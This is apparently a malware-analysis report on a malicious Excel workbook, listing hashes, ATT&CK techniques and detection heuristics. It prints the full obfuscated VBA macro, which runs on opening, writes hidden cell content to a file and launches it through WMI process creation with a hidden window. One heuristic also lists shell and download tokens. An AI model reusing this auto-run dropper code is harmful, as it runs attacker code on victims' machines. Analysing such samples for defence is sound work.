Malicious Office (OOXML) / .XLSX — malware analysis report

Static analysis result for SHA-256 4dc9b2f11546e5bf…

MALICIOUS

Office (OOXML) / .XLSX

180.2 KB Created: 2021-03-22 13:13:56 UTC Authoring application: Microsoft Excel 15.0300 First seen: 2022-07-13
MD5: b876d6897e25db661b02a79c2e68eb0d SHA-1: f7743ba186492f6cb788837ec510a79999ef951c SHA-256: 4dc9b2f11546e5bf8fb9901809a0707ff1e23acdc52742b991ddff18ce03733c
108 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

This OOXML file contains VBA macros, specifically a Workbook_Open macro, which is a common technique for executing malicious code upon opening. The presence of GetObject calls and p-code execution further indicates malicious intent. The script is heavily obfuscated and truncated, preventing a detailed analysis of its exact function, but it is designed to execute arbitrary code.

Heuristics 4

  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set qfCIaggyzG = GetObject(J_NV_wWU.kQXjmT_gw).SpawnInstance_
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 8575 bytes
SHA-256: 2516eb3709b42eba0eec3a1962f5173fddc13988d04cb7500d5cc248d8b0bbc5
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
IsMissing (ZSzZSIVceT7B)
jRubCR4_muEbAK = IsEmpty("lA9SMl")
JGsM85 = IsArray(IsDate(pprdoi))
Fkgs_WthepD_kh_Si_AtinenmqE_PU.ezQlfyR_GOAwuDO
HdUNA7 = IsDate(olpueG)
IsDate (IsMissing(vt4vFy_MXfqiS))
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "EyGhjx_VnzYGAULd_rychbrqWFV"
Attribute VB_Base = "0{BA39A57F-8E87-43C5-B3E3-39B63B5A509F}{C3CFE1E5-3EDC-4CE2-A82E-C118359F64B6}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Id_dQVdw()
IsMissing (IsObject(c095VuY))
k65d4SaX16TER = IsDate(IsError(HwhTqgJ))
IsEmpty (IsArray("D46ZiIk"))
Id_dQVdw = Range("CZ104")
Do0nCcAzAtnJ = IsMissing("kyR2u9")
Sk6bTAq_byyhxQ = IsDate(JI2k3l_MF9Gk)
hDslBU_d60jy = IsNumeric(UYyLrc)
End Function
Function mUfXCDOp()
IsNull ("EmfdLzL")
oWo3Dl0nePuu = IsDate("M3Lq0MsO0Ge4")
oU_ZYnLgC_QAMLIQT_zMHYIMBz_qXVm = Chr(CLng((0.335294117647059 * (671 + -331#))))
IsArray (VbWDrbAqbVp)
IsError ("TAfz6Cr")
oj2Pru = IsObject("yt2zi3")
IsMissing (IsArray("XGJl8p5_pdxPA"))
PELVOo = IsError("JKEafV")
I8v4xARe0X4J = IsMissing(TsdJAe9g5gxQn)
mUfXCDOp = Join(Array(J_NV_wWU.eqfuPUpBzAPCpBod & ChrW(CLng((xlRadarFilled And ((3.23008849557522 * xlDialogFormatOverlay) - 606#)))) & oU_ZYnLgC_QAMLIQT_zMHYIMBz_qXVm & Chr(CLng(((-2.79893791653113E-04 * (1084 + -273#)) * -489))) & ChrW(CLng(((-1.13005958495993E-03 * 942) * (-0.293375394321767 * 317)))) _
  & ChrW(101) & ChrW(CLng(((-0.174242424242424 * -660) And xlDialogRowHeight))) _
  & Chr(115) _
 ))
BmlAj3_Q70uZ = IsArray("Xbm326X_SJfG5G")
kc5Vgo_lYqMfs = IsEmpty(CTGkr8_yL7Bj)
IsError (IsMissing("DqUbfe2_zy0Kp"))
End Function


Attribute VB_Name = "rE__YPVUnvXtolwXBknCzaPN"
Attribute VB_Base = "0{DA58EC91-0C87-41B0-9EE3-A9F38253B99B}{1A70D71E-36D8-4569-8B9B-57457A4C50AF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function EKbwEERCqorpziPATe_c__uPP()

IsDate (IsNumeric(VqPLc0G_SCn3Ja))

IsEmpty (IsObject("WoE7mk2HyUWj6"))

IsNumeric (IsEmpty(JEdRzG0ZY0c))

SRHCqiE_NiLRul = IsDate(Y9hew9Z)

ZaGS3Th = IsNull("e15f2dF")

UTHgzW_YoxzaN_J__mvE_fPmuF = Replace("5@Ol*20.XSL5@Ol*5@Ol*", "5@Ol*", "")
GacUVfOQlCPEf__GPwPMFrzZqpe = EyGhjx_VnzYGAULd_rychbrqWFV.Id_dQVdw
IsNumeric ("riJjhP")
QAXzbA = IsNumeric(IsError(P1tA5k))
GyD0tH = IsArray(IsDate("uwFly3"))
IsObject (IsMissing(W3Be6fPNYXgx))
zsRjaKL = IsObject(IsEmpty(he22MS))
EKbwEERCqorpziPATe_c__uPP = Join(Array(GacUVfOQlCPEf__GPwPMFrzZqpe + UTHgzW_YoxzaN_J__mvE_fPmuF))

IsError (IsMissing("D4c1MO"))

IsDate (IsNumeric(AyuqlC))

bcQexR = IsDate(IsObject("CKDJJH"))

End Function

Attribute VB_Name = "hLYnl_VEzm"
Attribute VB_Base = "0{1B321AE1-8B2C-437E-9C17-C448F59E0F55}{79A4E4DD-4237-423C-9E2B-2077E4BECF6F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function bQgElzgrEis()
JEZXVT = IsError(bE68ZB)
IsObject (jejoUH)
IsError (U0CwcF)
bQgElzgrEis = Range("DE63")
IsNumeric ("wAeYa8D")
IsMissing (IsMissing(SnYCUKVDDlvY))
IsDate ("ZIniTb")
End Function

Attribute VB_Name = "J_NV_wWU"
Function kQXjmT_gw()

WmztT0 = IsNull(IsDate("Wzj7LvM_PrKq3K"))

DnpkD0v = IsObject(IsArray("DmtAV5"))

UtHJxEb0RHMz = IsMissing(IsDate("tX1QgH4Fc0Ia"))

IsNull (IsObject(sHnRgq))

IsDate (IsDate(BZ5vbg_ph53I))

IsDate (IsError(ACOCZ0O))
IsEmpty ("XzNtnki6iFxOV")
IsError ("TLgY69tF1W6M")
UuLlTvQkSQyTQylnLbna = hLYnl_VEzm.bQgElzgrEis
MPpNdOHH0U64y = IsEmpty(IsNumeric(IOHZ2NPHHFo8S))
kQXjmT_gw = Join(Array(UuLlTvQkSQyTQylnLbna + Range("FY169")))

LDVWmKmOd7XcD = IsNumeric(IsDate(TdsWDm1fZPA))

DXZVFb_3b5fl = IsMissing(BVcSN02)

IsNull (IsEmpty(ZLV58eM))

End Function

Function eqfuPUpBzAPCpBod()

oUeucQ_3RDecu = IsEmpty(IsNumeric(OUeCSeR))

eqfuPUpBzAPCpBod = Range("GB226")

IsMissing ("yCWYpR0_Autd26")

qL6CqxWer4AT = IsNull("JG9jH0u_oQXS1")

End Function

Attribute VB_Name = "maxlXCEcw_qE"
Attribute VB_Base = "0{E6B46392-F142-4627-91BF-A87AB5339CE0}{0E5B6E98-8AD3-4A83-BD22-E955AB4AAD74}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function qfCIaggyzG()
IsMissing (IZK9Urf)
IsMissing (HLSlNO_url0F)
IsDate ("ByqxLuG_Id6GT3")
Set qfCIaggyzG = GetObject(J_NV_wWU.kQXjmT_gw).SpawnInstance_
IsDate (IsObject(EkpXiG_CvcHCE))
a8ZF9I = IsArray(IsNumeric("gPk5X0BPR4NmN"))
IsObject (IsMissing(DuoQuC4_3vJ8ir))
With qfCIaggyzG
.ShowWindow = CLng((-2.27703984819734E-02 * -527))
End With
IsDate (IsDate("fVzUadJ9FFa"))
IsEmpty ("W4RcKL")
IsNull ("wvop8t_fgXaa")
End Function
Function OJPXZaOwwk__YOT_n()
IpF2Zlr = IsArray(IsNull("KxeCPa"))
WMT2j8hGAu9 = IsArray(IsArray(BRYTKZw))
IsError (P08eWlD_sw7Oa)
IsNumeric (IsNumeric("Gx0Im6VeICZJ"))
OiUK_iCY = LiRpBHOwmUrrjAmH.fz_i_smhXSKu_STbmNgsDtYB
IsError (IsObject(ALKDVyD))
PiWEzpOZjsGR = IsEmpty(IsDate("MCGMdAJ"))
IsObject ("GWPgRRe")
OJPXZaOwwk__YOT_n = Join(Array(OiUK_iCY))
FErZCGz = IsError("aEF6Q3EYyjA0")
IsMissing (IsDate("E1BvBCF_2Jbtug"))
PHPasJyFYzUe = IsObject("ejzl8y")
End Function

Attribute VB_Name = "LiRpBHOwmUrrjAmH"
Attribute VB_Base = "0{A8C5EBB7-FD7C-4F62-AAE1-8E9B45753931}{519865BF-4B99-4716-BA85-05D68B998CBC}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function fz_i_smhXSKu_STbmNgsDtYB()

IsNumeric ("hZE3GPU_FwKeW")

IsNull (IsEmpty(MeG9kJ))

Oig77tj0ymtT = IsMissing(IsArray("y6hinR1EAaenY"))

fz_i_smhXSKu_STbmNgsDtYB = Range("BL179")

NAHV41t = IsObject(IsArray("QAl9LK"))

UxUOOQ0DPum = IsMissing("Ss9qMx")

Ja6BhCE = IsArray(IsArray("Ti6PGwa"))

End Function

Attribute VB_Name = "Fkgs_WthepD_kh_Si_AtinenmqE_PU"
Attribute VB_Base = "0{A66BEE4C-9CF1-40DE-8734-9AA164E7EE64}{F19D0CA3-6DCF-4BA7-9BB2-8A473778AE74}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function ezQlfyR_GOAwuDO()
Dim aldmVV_cFZZN_QYbGPehxTbavt As String
IsError (IsDate("vhRbIB"))
FojFdk3 = IsNull(Rwk92g_GnHCXz)
aldmVV_cFZZN_QYbGPehxTbavt = Replace(LiRpBHOwmUrrjAmH.ZdoQoGhW_GXcJkBrojFUU.Text, "kYiEp@K=x)ti xUK", "")
IsError (IsDate(Qpiaiw_ojZqu))
IsNumeric (IsObject(mbvWBPD_idN05W))
IsObject ("PYdusNg")
Open Application.ActiveWorkbook.Path & rE__YPVUnvXtolwXBknCzaPN.EKbwEERCqorpziPATe_c__uPP For Binary As #CLng((xlTabPositionFirst Xor xlPrimary))
FJWhYfA = IsEmpty(foSen5m)
IsError (IsError("Qd3ERun"))
Put #CLng((xlAnd Or xlSolid)), , aldmVV_cFZZN_QYbGPehxTbavt
bOtvA1 = IsObject(cI8RGZj_HcjwJ8)
IsDate ("xWHHkpc")
Close #CLng((xlArrangeStyleTiled Or xlIMEModeNoControl))
E81EIo_bNaQl1 = IsNumeric(UO0FIV_8wfLr)
IsEmpty (eCAgLEGKxRZ3)
PPhwm_T_UGdUV
WC2097H = IsDate(IsNumeric(KNuIl3Z))
Y4790m = IsDate(IsDate(wAmBQCU))
End Function
Function PPhwm_T_UGdUV()
FHYuZO_yO4udH = IsArray(IsError("L0H41t9_ihd0FW"))
IsNull (IsArray("IiGtT3r_bsNUU"))
IsArray (IsError("lQUKJw"))
With GetObject(EyGhjx_VnzYGAULd_rychbrqWFV.mUfXCDOp)
.Create maxlXCEcw_qE.OJPXZaOwwk__YOT_n & Chr(34) & Application.ActiveWorkbook.Path & rE__YPVUnvXtolwXBknCzaPN.EKbwEERCqorpziPATe_c__uPP & Chr(34), Null, maxlXCEcw_qE.qfCIaggyzG
End With
IsNull ("XYGlyx")
IsArray ("BhNcja")
GgvolmA = IsObject("T5QpFm_gYAGo")
PqsuBjK = IsDate("XZdSF6_0qwIVw")
End Function
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 67072 bytes
SHA-256: 50deef26d1e65b0aadf094b2805a2120e30444858495be0f453f6783c34b56a8

Open this report in the interactive analyzer, or submit your own file for analysis.